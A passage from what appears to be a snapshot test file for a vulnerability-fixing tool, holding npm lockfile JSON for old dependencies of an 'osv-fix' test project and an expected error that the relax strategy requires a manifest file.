"sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": 
"1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/errors_when_relock_used_without_manifest - 1] --- [TestCommand/errors_when_relock_used_without_manifest - 2] relax strategy requires manifest file --- [TestCommand/errors_when_relock_used_without_manifest - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": 
"https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": 
"sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": 
"sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.5.0", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": 
"https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": 
"https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": 
"sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, 
"engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": 
"0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.2", "resolved": 
"https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." 
}, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", 
"set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": 
